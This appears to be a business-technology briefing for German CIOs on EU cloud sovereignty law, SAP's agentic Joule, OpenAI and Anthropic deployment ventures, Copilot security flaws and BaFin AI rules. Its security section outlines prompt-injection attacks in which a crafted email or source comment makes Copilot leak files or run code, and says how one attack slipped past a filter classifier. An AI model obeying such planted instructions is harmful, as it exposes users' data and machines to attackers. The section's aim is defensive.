On 27 May 2026 the European Commission plans to publish its Tech Sovereignty Package, a bundle made up of two laws: the Cloud and AI Development Act (CADA) and a revamped Chips Act 2.0. Behind the scenes, officials are debating whether to bar US hyperscalers — Amazon Web Services, Microsoft Azure, Google Cloud — from processing the most sensitive public-sector data, such as health records, judicial files and certain financial information. At the same time, the EU just trimmed parts of its AI Act on 7 May, including halving the grace period for labelling AI-generated content from six to three months. For enterprises, the question is no longer whether sovereign hosting matters, but which workloads must move, and how quickly.

In a glass-walled meeting room on the Berlaymont's 13th floor, Executive Vice-President Henna Virkkunen has spent the spring chairing a series of closed sessions on a single, awkward question: how much of Europe's most sensitive data should sit on infrastructure ultimately controlled by US companies. According to people familiar with the discussions, the Commission is weighing categories of public-sector data — healthcare records, judicial files, supervisory data from financial regulators — that could be carved out from US-controlled cloud processing entirely. The framing matters. The Commission is not preparing an outright ban on AWS, Azure or Google Cloud in EU public contracts, but a tiered taxonomy of sovereignty that will, for the first time, codify when a hyperscaler is and is not acceptable. Virkkunen has been blunt about the underlying goal, saying it is important that, as she put it, Europe is the one ‘controlling that in Europe and the data is also localised in Europe.’ The vehicle is the Cloud and AI Development Act, the first half of the Tech Sovereignty Package. The second half is a recast Chips Act 2.0 that would let the Commission invest directly in cross-border fab projects — a striking departure from its earlier role as coordinator and state-aid referee, after the European Court of Auditors warned that the bloc is on track for roughly 12 percent of global chip production by 2030 rather than the original 20 percent target. The package was meant for March, then April. It is now firmly pencilled in for 27 May, the day after Virkkunen's keynote at EuroDIG 2026. The catch: any data-handling restrictions will eventually need the political nod of all 27 member states, and several capitals — Dublin, The Hague, Stockholm — quietly host significant hyperscaler footprints they would rather not antagonise. For the DAX40 chief information officers Cowork briefings reach, the Brussels debate is no longer abstract. Procurement teams at German insurers, hospital groups and Landesbanken have spent the past 18 months pushing workloads into AWS European Sovereign Cloud, Microsoft's Bleu/Delos partnership constructs, and Google's Sovereign Controls. Each was sold on the promise of legal isolation from US extraterritorial reach. CADA threatens to redraw that map: a workload that today qualifies as ‘sovereign enough’ under a hyperscaler partner-cloud may, by autumn, fall on the wrong side of a new EU category line. Lobbyists for European cloud providers — OVHcloud, IONOS, Aruba, T-Systems — have spent weeks pressing the Commission to keep US-controlled entities out of the top tier, regardless of where the servers sit.

The convergence of dates is unusually compressed. On 7 May, the Council presidency and European Parliament negotiators reached a provisional deal on ‘Omnibus VII’ — the simplification package that streamlines the 2024 AI Act. The hardest obligations on general-purpose AI models are pushed into late 2027, most factory and industrial AI is carved out of scope, and a new ban on AI-generated non-consensual sexual imagery is bolted on. Tucked into the same agreement is the detail that matters most for enterprise content teams: the grace period for providers to implement transparency solutions for AI-generated content drops from six months to three, with the new deadline set at 2 December 2026. The transparency Code of Practice itself — covering watermarking, metadata embedding and deepfake labelling under Article 50 — is being shaped in working group sessions running through May, with a second draft already circulating and finalisation expected by June. The chronology then steps quickly: 8 May saw the Commission's transparency consultation move into its next stakeholder phase; 26 May, Virkkunen delivers her EuroDIG keynote; 27 May, CADA and Chips Act 2.0 land; through summer, member states begin the slow grind of trilogues. To make the numbers tangible, consider the comparison. The original 2022 Chips Act mobilised roughly EUR 43 billion in public and private commitments toward doubling Europe's share of global semiconductor production to 20 percent. By the Court of Auditors' arithmetic, Europe will land closer to 12 percent — a shortfall larger, in capacity terms, than the entire output of TSMC's planned Dresden fab. Chips Act 2.0 is the Commission's admission that subsidy coordination alone did not work; the new bill would let Brussels write equity cheques. The cloud side has its own running history. In January 2026, AWS opened its European Sovereign Cloud out of Brandenburg with a EUR 7.8 billion build-out and appointed Stefan Hoechbauer to run it. Microsoft has accelerated the Bleu joint venture in France and Delos Cloud in Germany. Google has expanded its ‘Sovereign Controls’ line. Not by accident: on 17 April, the Commission awarded its first contracts under the new Cloud Sovereignty Framework — up to EUR 180 million over six years split across four consortia from Luxembourg, Germany, France and Belgium, every one of them European-controlled. CADA is the law that would turn that procurement preference into a horizontal rule. The political backdrop is a sharp pivot from the simplification camp. In a joint op-ed in Handelsblatt and Corriere della Sera in early May, the CEOs of ASML, Airbus, Ericsson, Mistral AI, Nokia, SAP and Siemens warned that Europe is spending its energy on rule-writing while the US and China scale capacity. Their lobbying achieved the AI Act delay. It has not, so far, dented the sovereignty agenda — which the same governments view as the necessary mirror image of deregulation.

For DAX40 CIOs, the immediate task is taxonomy. The Commission's emerging categories — broadly: sensitive public data, regulated-sector workloads, general enterprise data, and non-sensitive — map only loosely onto the data-classification schemes most large German companies already run. Procurement, legal and architecture teams will need a translation layer. Three concrete actions are surfacing in CIO conversations Cowork tracks. First, freeze new sensitive-tier migrations into hyperscaler-controlled stacks until the CADA text is on the table. Several DAX40 insurers have already paused phase-two Azure migrations covering claims data; one Landesbank has delayed a planned Google Cloud pilot for supervisory reporting. Second, demand contractual carve-outs from hyperscaler partner-cloud constructs that explicitly anticipate Article-level categorisation under CADA — including exit rights without penalty if a workload is reclassified. Third, audit the AI content pipeline against the new 2 December transparency deadline. Marketing, communications and customer-service functions running generative tools at scale now have three months less than they planned to implement watermarking, provenance metadata and deepfake labels. The bigger strategic point is that sovereignty is becoming a procurement category rather than a marketing claim. Until now, ‘sovereign cloud’ has been a label hyperscalers and European challengers fought over in slide decks. After 27 May, it will be a regulated tier — with audit consequences. DAX40 boards that treat this as an IT-architecture question will miss the point. It is, increasingly, an industrial-policy question about which infrastructure stack Germany's regulated industries are allowed to run on for the next decade.

SAP's annual Sapphire conference is where the Walldorf group tells its largest customers what to budget for next. This year, the headline is Joule, SAP's in-house AI assistant, which has been rebuilt as an ‘agentic’ layer that can take actions inside finance, HR, procurement and supply chain on a user's behalf. The new SAP AI Foundation bundles models, governance and a marketplace called the AI Agent Hub, where SAP and outside agents are meant to talk to each other through an open Agent-to-Agent (A2A) protocol. For DAX40 boards still wrestling with S/4HANA migrations, the question is simple: is this the credible enterprise answer to Microsoft Copilot and Salesforce Agentforce, or another reason to pay SAP more for the same data?

Christian Klein walked onto the Orange County Convention Center stage in Orlando on Monday morning in a navy suit, no tie, and opened with a line he has been rehearsing for a year. ‘ERP is no longer the system of record,’ the SAP chief executive told an audience of roughly 25,000 customers and partners. ‘It is becoming the system of decisions.’ Behind him, a wall-sized animation showed dozens of agent icons connecting through what SAP now calls the AI Agent Hub, the centerpiece of the reimagined Joule experience and the new SAP AI Foundation. The announcement matters because of what it consolidates. Joule, first introduced in 2023 as a chat sidebar, has been re-engineered into an orchestration layer that now spans 35-plus SAP products, from S/4HANA Cloud and SuccessFactors to Ariba, Concur and the LeanIX portfolio acquired in 2023. SAP put the skill count at more than 2,500, up from roughly 1,200 a year ago, and confirmed more than 30 specialised agents in general availability. Muhammad Alam, the executive board member for product engineering, framed the shift bluntly from the stage: ‘We are moving Joule from a copilot you talk to, to an operating layer that gets work done while you sleep.’ The second pillar is the Agent-to-Agent protocol. SAP aligned its A2A implementation with the open standard originally seeded by Google last year, and is publishing a Joule A2A toolkit on GitHub that lets developers register external agents — LangGraph workflows, OpenAI Assistants, Salesforce Agentforce skills — inside the SAP Agent Hub through the BTP Cloud Foundry runtime. In practice, an Ariba sourcing agent should be able to hand off a contract clause check to a Microsoft 365 Copilot agent running on Anthropic's Claude, then bring the result back into an S/4HANA workflow without a human in the loop. Not by accident, the choreography around the keynote leaned heavily on partners. Satya Nadella appeared by video to confirm that the first-of-its-kind Joule–Microsoft 365 Copilot integration, in preview through 2025, is now fully production. A pre-recorded segment featured Marc Benioff of Salesforce nodding politely at the A2A standard, even as Agentforce 360 competes head-on for the same agent budget. Walter Sun, who joined SAP last year as global head of AI, used a customer panel to walk through deployments at Mercedes-Benz, Lufthansa Technik and a major DAX-listed chemicals group, where Joule is reportedly orchestrating quote-to-cash and shop-floor exception handling. More remarkable still was what Klein chose not to lean on: the share price. SAP stock has shed roughly 16 percent year-to-date, weighed down by a Handelsblatt report last month that only 3 percent of customers were using SAP Business AI productively, against a DSAG survey showing 77 percent of AI-active enterprises preferring non-SAP tooling. Sapphire 2026 is the answer to that data point. Whether it is convincing enough is the question every chief information officer in Orlando is now whispering about over coffee.

Strip away the staging and SAP's pitch resolves into three architectural moves, each with a non-trivial trade-off. First, AI Foundation. Until last year, SAP's AI assets were scattered across the Generative AI Hub, Joule Studio, the LeanIX agent catalogue and a handful of model partnerships. AI Foundation collapses them into one BTP-resident control plane with shared identity, observability, prompt management, model routing and a curated catalogue that now includes OpenAI GPT-class models, Anthropic Claude, Google Gemini, Mistral's frontier models via the November 2025 sovereign deal, and SAP's own ABAP-tuned model, SAP-ABAP-1. For a DAX40 CIO, the appeal is governance: one place to enforce data residency, audit logs, and the EU AI Act's Article 50 disclosure requirements across every agent that touches a production SAP table. Second, Joule Studio and the agent runtime. Joule Studio's Agent Builder went generally available in January and has been extended at Sapphire with a multi-agent orchestrator, retrieval against Business Data Cloud, and a low-code designer aimed at the SAP Build user base. The agents are not just LLM chains — they are tied into SAP's declarative business object model (the Public Cloud ABAP ‘golden path’), so an agent that fires a purchase order is constrained by the same authorisation objects, segregation-of-duty rules and Schemes of Manoeuvre that an SAP GUI user would face. That is genuinely different from a Copilot Studio bot calling a Graph endpoint. Third, the A2A protocol and Agent Hub. This is where the openness claim will be tested. The protocol itself is a thin specification — agent cards, task lifecycle, asynchronous messaging — and SAP's implementation supports both sides: Joule agents can be discovered by outside hubs, and outside agents can be registered into the SAP Agent Hub through the Agent Gateway. Crucially, however, the trust path runs through SAP. Authentication uses BTP's Identity Authentication Service. Billing and entitlement run through SAP's commerce backbone. The audit trail is SAP's. Federation, in other words, is real at the protocol layer and concentric at the commercial layer. For anyone who lived through the R/3 era, the design rhymes. In 1992 SAP turned a transactional database into a system of record by making integration cheaper inside the suite than outside; the BAPIs were open, but the gravity stayed in Walldorf. The same physics applies here. An A2A handshake between Joule and Agentforce is technically permitted, but the data lineage, the policy engine and the support escalation all sit on SAP infrastructure. Customers who want a genuinely vendor-neutral agent fabric — say, a Lufthansa or a Siemens running heterogeneous estates — will still need their own orchestration layer above SAP, Microsoft and Salesforce. SAP knows this, which is why LeanIX's enterprise architecture catalogue has been quietly repositioned as that neutral layer. The economic model is the final tell. SAP confirmed AI units — the consumption metric that began life as a clumsy add-on — will roll forward, but most net-new Joule capacity is now bundled into RISE with SAP and GROW with SAP contracts at the premium tier. Translated: to unlock agent-grade Joule, customers must move to SAP's preferred cloud commercial model. That is open architecture with a toll booth at the on-ramp.

For DAX40 boards, the calculus is no longer whether to deploy enterprise AI but where the orchestration layer lives. The honest answer in 2026 is: in at least three places at once. Microsoft 365 Copilot — now defaulting to Anthropic's Claude for EU and UK tenants since the April 3 admin-centre switch — has become the productivity surface. Salesforce Agentforce 360 owns customer-facing sales and service flows wherever Salesforce is the CRM of record. And Joule, after Orlando, is the only credible contender for the system-of-decisions layer that sits on top of S/4HANA, Ariba and SuccessFactors. Three practical consequences. One: procurement teams must now negotiate AI-unit consumption alongside RISE migration credits, or risk the same shelfware problem that bedevilled SAP's early HANA story. Two: enterprise architecture functions should treat the A2A protocol as table stakes and ask vendors for written commitments on agent portability, not just interoperability — the difference is whether a customer can lift a Joule skill into another hub without re-implementation. Three: the Mistral and Aleph Alpha tie-ins matter for regulated workloads (defence, public sector, certain pharma), but they do not absolve a DAX40 CIO from a multi-vendor reality. Cohere's announced merger with Aleph Alpha, with Schwarz Group as anchor backer, has just reshuffled the European sovereign stack again. SAP's sovereignty narrative is real, but it is now competing with a transatlantic counterweight, not standing alone.

OpenAI has set up a new company that does not sell software — it sells the people who install it. Together with private-equity giants TPG, Brookfield, Advent and Bain Capital, plus fifteen smaller co-investors, it raised about $4 billion at a roughly $10 billion valuation. OpenAI keeps majority control. The new entity, called The Deployment Company, sends OpenAI engineers directly into the offices of companies owned by those PE firms to wire AI into day-to-day operations. To make the deal palatable to backers, OpenAI is reported to have promised them a 17.5% annual return for five years. Anthropic announced an almost identical $1.5 billion venture with Blackstone, Hellman & Friedman and Goldman Sachs the same week. Both moves bypass the implementation work normally done by McKinsey, Accenture and the Big Four.

On a Monday in early May, in a windowless room at TPG's San Francisco office, Brad Lightcap walked Jon Winkelried's team through a spreadsheet that looked nothing like a typical software contract. Lightcap, freshly relinquishing the OpenAI chief operating officer role to run what insiders had been calling ‘DeployCo’ for six months, had a single number circled at the top: 17.5%. That, two people briefed on the conversation told reporters, was the floor return OpenAI was prepared to underwrite for its private-equity backers across a five-year hold. Winkelried, who had spent the early winter telling Bloomberg that TPG had stood up an internal AI task force, did not need much persuading. By the end of that week, OpenAI had locked in $4 billion of fresh capital from nineteen investors, finalised a Delaware-domiciled joint venture valued at roughly $10 billion, and committed an initial $500 million of its own equity — with an option to add another $1 billion later — into a vehicle it will majority-own and Lightcap will run. The Deployment Company is not another consulting brand. It is an industrial template. OpenAI is hiring dozens of ‘forward-deployed engineers’ — a delivery pattern Palantir spent fifteen years refining — and embedding them inside the operating companies of TPG, Brookfield, Advent, Bain and their co-investors. The engineers do not write decks. They wire ChatGPT, GPT-5 endpoints and the upcoming agent stack into accounts payable at a mid-market healthcare provider, into underwriting at a buyout-owned specialty insurer, into demand forecasting at a logistics roll-up. ‘Our culture is that we try to embody the principles of being both a research and a deployment company,’ Lightcap had told McKinsey in an interview months earlier — a line that now reads like a memo to the consulting industry rather than a philosophy statement. The pivot is in the second act. Anthropic, four days earlier, had announced a structurally near-identical vehicle with Blackstone, Hellman & Friedman and Goldman Sachs, with Apollo, General Atlantic, Leonard Green, GIC and Sequoia rounding out the table. Total commitment: roughly $1.5 billion. Same forward-deployed model. Same initial target: PE-owned mid-caps in healthcare, manufacturing, financial services, retail and real estate. In the space of a single business week, the two model providers had carved up the private-equity industry between them. And both did it as Anthropic was simultaneously sounding investors on a $50 billion primary round at a $900 billion valuation — a figure that, if it closes, would put Anthropic ahead of OpenAI's own $852 billion March mark and turn the new deployment arms into captive distribution for what are, in effect, the two largest private companies in the world.

Start with the headline structure. OpenAI's joint venture sits at a roughly $10 billion post-money valuation. Investors put in about $4 billion, OpenAI seeded $500 million with an option to add $1 billion, and the rest of the capitalisation comes from the equity OpenAI grants for being the operating partner, the brand, the engineering bench and — uniquely — the underwriter. The 17.5% guaranteed annual return over five years is the line that has caused the most squinting on the buy side. Compounded over the full term, that is an aggregate floor return of roughly 124% on the PE consortium's $4 billion, or about $4.96 billion of contractual upside before any equity gains. By design, this turns a venture-style position into something that underwrites like a credit fund. ‘Private equity vehicles do not typically receive an explicit return commitment from the company they are funding,’ Bloomberg noted dryly. The structure has no real precedent at this scale: the closest comparison is the preferred-equity sleeve that anchored SoftBank's WeWork rescue, but here the underwriter is the operating company itself. Now scale the addressable revenue. Blackstone alone holds 250-plus portfolio companies generating well over $1 trillion in aggregate revenue. TPG, Brookfield, Advent, Bain and the other OpenAI investors hold thousands more. If The Deployment Company captures even a 1–2% implementation-and-run fee on a serious AI rebuild at the median PE-owned mid-cap — say $5–10 million per engagement — a pipeline of just 400 portfolio companies maps to $2–4 billion of annualised revenue inside three years. That comfortably covers the guaranteed return, leaves OpenAI majority of the upside, and converts a venture round into something closer to a structured services royalty. The historical comparison matters. The entire 2024 global consulting M&A pool came in at roughly $3.5 billion, by Mergermarket's count. OpenAI just stood up a single distribution vehicle in one week that is larger than the entire 2024 consulting M&A pool. Anthropic added another $1.5 billion. Set those against the implementation revenue lines that have funded McKinsey, BCG, Accenture, Deloitte, EY, KPMG and PwC for two decades — collectively north of $200 billion a year — and the two ventures are pinholes. But pinholes in the most profitable layer. The Big Four make their margin on staff-augmentation and systems integration, not on slide-ware. Anthropic's annualised revenue is already running toward $45 billion, up from $9 billion at the end of 2025, with more than 1,000 customers each spending over $1 million a year. The model providers are no longer the suppliers. They are the channel.

The structural problem for the Big Four is not pricing. It is sequencing. A McKinsey engagement at a PE-owned mid-cap typically opens with a six-week diagnostic, runs a quarter of design, then six to nine months of staffed implementation. The Deployment Company sells a different curve: forward-deployed engineers shipping production AI in weeks because they own the model, the tooling and the integration patterns. Three months earlier — in February 2026 — OpenAI had announced a frontier-agent partnership with McKinsey, BCG, Accenture and Capgemini. The DeployCo announcement effectively reroutes the most lucrative tier of that work, the mid-market PE portfolio rollout, away from those partners and into a JV the consultants do not sit inside. Accenture, with its engineering depth, may survive by negotiating a subcontracting layer. McKinsey, anchored in strategy work, has fewer options. Inside the DACH market that this briefing serves, the read for DAX40 advisors is twofold: PE-owned Mittelstand competitors will move faster than their corporate clients, and the consultancies that historically intermediated AI implementation now face a credible alternative that arrives pre-capitalised.

Anyone who has put Microsoft 365 Copilot, Copilot Chat or GitHub Copilot into production over the past twelve months has also handed the models access to mail, SharePoint files, Teams chats and source code. Those very connections are now the attack target. On May 7, 2026, Microsoft disclosed three critical vulnerabilities in M365 Copilot and patched them across the cloud — each one lets attackers pull confidential data out of the AI assistant without a click and without privileges. Combined with the August 2025 GitHub Copilot case (CVE-2025-53773, CVSS 9.6, which turns prompt injection into remote code execution), a pattern emerges: prompt injection is the SQL injection of our era. For DAX40 CIOs, BaFin and BSI expectations for AI deployments are no longer abstract — they are operational from now on.

Estevam Arantes, a security researcher embedded in Microsoft's own red team, had found the first bug weeks before Patch Tuesday inside a controlled tenant: a carefully crafted email to an M365 user was enough to make Copilot exfiltrate internal SharePoint content via a manipulated markdown link on its next Business Chat invocation — without the user opening, clicking, or even seeing the attachment. The second bug, surfaced in parallel by Arantes and an independent researcher using the handle 0xSombra, abused the same mechanism via a second input path. The third hit Copilot Chat inside Edge and could be triggered via command injection. On May 7 the Microsoft Security Response Center published the trio as CVE-2026-26129, CVE-2026-26164 and CVE-2026-33111. The official CVSS score of 7.5 understates the exposure: all three are network-accessible, no privileges required, no user interaction, with a high confidentiality impact — the exact profile that actuaries at Munich Re have been flagging as critical for months. “The pattern is clear,” Microsoft's CVP for Security Vasu Jakkal wrote in an internal note quoted by the Microsoft Security Blog. “We see indirect prompt injection as a systemic weakness of an entire product class, not as a single bug.” The holes sit inside an escalation arc. In June 2025, Aim Security published EchoLeak (CVE-2025-32711, CVSS 9.3), the first documented zero-click attack on a production LLM application — again M365 Copilot, again via a crafted email, again with data exfiltration from Outlook, SharePoint and Teams. In August 2025 came CVE-2025-53773 in GitHub Copilot and Visual Studio Code: a single comment inside a source file was enough to reconfigure the assistant into “YOLO Mode” and force remote code execution on the developer's machine. Wiz Research documented one case in which a compromised npm package installed via prompt injection planted a persistent daemon on roughly 4,000 developer workstations and lifted SSH keys, cloud tokens and credentials. The historical comparison writes itself. What the 2017 release of the ShadowBrokers NSA tools did for Windows network security, this May trio does for AI assistants — the moment when academic proofs of concept become operational risk models. Microsoft has closed the three current holes server-side; admins have nothing to roll out. That is the good news. The bad news: the architectural weakness is unchanged. As long as LLM agents mix data from untrusted inputs with privileged tool calls, more bugs of the same class are coming — in Claude for Enterprise, Joule, Glean and Gemini for Workspace, too.

Three data points show the shift in the threat landscape. First, Wiz Research measured a 340 percent year-over-year rise in documented prompt-injection attempts against production enterprise AI systems in Q4 2025. Successful attacks with measurable data exfiltration or unauthorized actions rose 190 percent over the same period. Munich Re explicitly classified prompt injection as a “major attack vector” in its annual Cyber Risk Report, with a specific note on low attacker cost and high scalability. Second, the agent identity gap we covered last week is quantifiable. Saviynt's CISO AI Risk Report 2026 surveyed 235 security leaders; 92 percent say they lack full visibility into AI identities in their environments. 86 percent do not enforce access policies on AI identities. 71 percent confirm AI systems already have access to ERP, CRM and finance platforms — only 16 percent govern that access effectively. Bessemer Venture Partners crystallised the implication in April, and the Cloud Security Alliance confirmed it in a parallel research note: 95 percent of CISOs doubt they could even detect a compromised agent. Only 5 percent feel able to contain the incident. Third, the economic dimension. IBM's Cost of a Data Breach Report 2025 prices breaches in environments without AI access controls at an average of $5.72 million. Shadow-AI incidents — models deployed without security sign-off — cost $4.63 million each. Concentric AI found an average of 802,000 oversharred files per organization, meaning every Copilot-enabled user can call them up. Sixteen percent of business-critical data sits outside what permission models are meant to allow. For DAX40 firms, the translation into hard numbers is brutal. An Allianz at 157,000 employees with a full Copilot license (about $30 per user per month plus Agent 365 at $15) runs at roughly $85 million per year — before a single security use case has been validated. Deutsche Bank, Mercedes-Benz and BMW sit in similar ranges. In April, Accenture took the global lead by extending its rollout to 200,000 employees. Scale the IBM figures to that population and the expected annual loss on an unsecured Copilot rollout sits in the low double-digit millions — a magnitude at which BaFin and BSI no longer accept excuses.

The technical diagnosis is straightforward: LLM agents violate a security principle the industry thought it had solved in the early 2000s — separation of code and data. SQL injection worked because form inputs were mixed with privileged database statements. Prompt injection follows the exact same pattern: untrusted content from emails, documents and webpages is mixed into the same token stream as the system prompt and the tool definitions. Microsoft, Google and Anthropic have trained filter classifiers (Microsoft's XPIA, Anthropic's Constitutional Classifier) meant to spot such manipulation. EchoLeak bypassed XPIA by hiding the malicious instruction in reference markdown. The May holes show that defense stays reactive as long as the architecture stays the same. Three layers do work. First, hard trust boundaries at the data tier — no mixing user-generated and system-generated content inside one context. Microsoft's Purview implementation and Anthropic's prompt shields point in this direction but remain partial. Second, output validation: every tool call an agent fires must run through a policy engine that checks the call against the user's original intent. Third, agent identity — every agent needs its own identity in Entra, Okta or Ping, with cleanly scoped permissions. Microsoft's Agent 365, generally available since May 1, ships exactly these building blocks. Running Copilot without Agent 365 or a comparable architecture means accepting the vulnerability pattern that May 2026 made visible.

Two German rule sets now sit on top of every AI system inside a regulated bank or insurer. The first is BaFin's December 2025 guidance that pulls artificial intelligence inside the Digital Operational Resilience Act (DORA) — treating models the way the regulator already treats core banking infrastructure. The second is the German AI Implementation Bill (the KI-Marktüberwachungs- und Innovationsförderungsgesetz, or KI-MIG), waved through Cabinet on 11 February 2026, which names BaFin as the financial-sector lead authority under the EU AI Act and slots the Federal Office for Information Security (BSI) in as the cybersecurity co-supervisor for high-risk systems. For DAX40 firms, the practical effect is an AI register, a lifecycle risk file and an outsourcing dossier for every production model — a compliance stack that goes live before the AI Act's 2 August 2026 high-risk deadline.

On a grey Berlin morning at the end of January, BaFin President Mark Branson sat down for the regulator's annual Risiken im Fokus press conference and used a portion of the floor to talk about something he rarely had before: the supervisor's own use of artificial intelligence, and the supervisor's rising unease about everyone else's. Branson told reporters BaFin had been quietly running an AI-driven market-abuse alert system and that ‘the chances of being caught in market abuse trading have never been so high.’ In the same breath, he flagged the macro side — ‘the risk is increasing that financial stability will be put to the test’ — and tied the warning to the ‘unresolved question of whether the euphoric growth forecasts and sky-high valuations surrounding artificial intelligence will be substantiated in the medium term.’ It was the public framing for a much more technical document Bonn had pushed out six weeks earlier: a 35-page Orientierungshilfe titled ‘ICT Risks in the Use of AI at Financial Entities,’ published on 18 December 2025, that for the first time spells out, in supervisory plain text, how a CRR institution or Solvency II insurer is meant to manage a model like Claude, Copilot or Joule inside the DORA framework. The guidance is formally non-binding. In practice, it is the operating manual every BaFin examiner will use the next time they walk into a board meeting at Deutsche Bank, Commerzbank, Allianz, Munich Re, Hannover Rück, DWS or Deka. The text is explicit on three points. First, AI is not a new regulatory category — it is a particular kind of ICT asset, subject to identification, protection, detection, response and recovery requirements across the entire model lifecycle, from data ingestion through retirement. Second, every AI system needs a management-approved AI strategy, a named owner, clearly assigned competencies and an entry in the ICT asset register feeding into DORA's Information Register on third-party arrangements. Third, when the model is supplied by a hyperscaler or a foundation-model lab — the typical setup for any meaningful enterprise deployment — it inherits the heavier outsourcing regime under Delegated Regulation (EU) 2025/532, including concentration-risk analysis and exit-plan documentation. Six weeks after the guidance dropped, on 11 February 2026, the federal Cabinet approved the long-awaited Gesetz zur Durchführung der KI-Verordnung — the German AI Implementation Bill, sent on to the Bundesrat two days later. Inside it, Section 10 hands BaFin the sectoral supervisory role for AI used by entities under its watch, and instructs it to define cybersecurity requirements for high-risk AI systems under Article 6 of the EU AI Act in coordination with the BSI and the Bundesnetzagentur. Hengeler Mueller and Gleiss Lutz partners briefing clients in the days after both flagged the same line: the architecture is now decided. DAX40 banks and insurers are double-regulated by design — once under DORA via BaFin, once under the AI Act via BaFin again — and BSI sits underneath the cyber assessment for any model that scores as high-risk.

To see how the German layer ended up where it is, run the regulatory clock back to 2018, when the European Banking Authority published its Recommendations on Outsourcing to Cloud Service Providers — the moment European supervisors first conceded that an institution's most critical infrastructure could legitimately live outside its own walls. Those guidelines, later folded into the broader EBA Outsourcing framework and then absorbed into DORA, are the closest precedent for what BaFin has just done with AI. The 18 December 2025 Orientierungshilfe is the most concrete national overlay on AI in financial services since that 2018 cloud-outsourcing turn, and it reads like its grandchild: same lifecycle structure, same insistence on board-level governance, same expectation that the supervisor can ask for evidence on demand. The sequence over the past nine months matters. On 2 August 2025, the EU AI Act's governance and GPAI obligations entered into force; Member States were supposed to have named their competent authorities by the same date. Germany missed the deadline. The political vacuum stretched across the late-2025 transition to the Merz government, during which Chancellor Merz publicly demanded carve-outs for industrial AI and Siemens warned most of its planned billion-euro AI spend would flow to the United States if EU rules were not eased. Inside that vacuum, BaFin moved first on its own turf: rather than wait for the implementation bill, it took the position that DORA — which had been fully applicable since 17 January 2025 — already gave it the legal hook to govern AI deployments through the ICT-risk side door. Hence the December guidance. Eight weeks later, the Cabinet bill ratified that posture, naming the Bundesnetzagentur as the lead market-surveillance authority through its new UKIM chamber, but explicitly preserving BaFin's sectoral role for finance. The pivot is that Germany has now built two cages around AI inside a regulated bank, and they overlap. The AI Act lens, applied through the implementation bill, classifies systems by risk level and triggers conformity-assessment, transparency and human-oversight duties from 2 August 2026 onward. The DORA lens, applied through the BaFin guidance, treats every AI system as a piece of ICT infrastructure and demands the full risk-management apparatus regardless of risk classification. A credit-scoring model can therefore be ‘high-risk’ under one regime and merely ‘ICT asset’ under the other — and the institution owes both files. Outside Germany, the contrast sharpens. In Switzerland, FINMA released its own AI governance framework in April 2026, principles-based rather than prescriptive: outcomes, not checklists. Austria's FMA, an integrated supervisor like BaFin, is leaning on the EU regime without an equivalent national overlay. The Bundesverband deutscher Banken (BdB) has used the consultation window to push back hard on the AI definition itself, arguing that linear and logistic regressions — ‘not a black box’, the BdB notes — should not be swept into the same regime as foundation models, and warning that strict sanctions could push banks to retire functioning models out of caution. The European Commission, under business pressure from across the bloc, has already conceded a partial delay to some AI Act rules. None of that has reached BaFin's guidance, which remains the binding posture for the German market.

For a DAX40 bank or insurer, the practical compliance assembly line is now visible end to end. Every production AI system — Deutsche Bank's TCS-built Cross-Border Compliance Assistant, DB Lumina on Google Cloud, Commerzbank's Hawk AI anti-money-laundering stack, the Microsoft Copilot rollouts inside Allianz and Munich Re, the SAP Joule deployments at any DAX40 industrial cross-holding — needs an entry in the ICT asset register, a named accountable executive, a lifecycle risk file, a third-party concentration assessment and, where the system meets Annex III, a separate high-risk file under the AI Act. The shared services question is sharp. A foundation-model contract signed by group IT but used by Deka asset management, DWS funds and Postbank retail simultaneously will need to be sliced into the outsourcing register of each regulated entity. Boards should expect BaFin's 2026 supervisory dialogues to open with the AI register. For Allianz and Munich Re, the insurance-specific wrinkle is that Solvency II governance interacts with DORA via the same lifecycle expectations; CROs will need to wire AI sign-offs into the existing model-validation chain rather than build a parallel committee.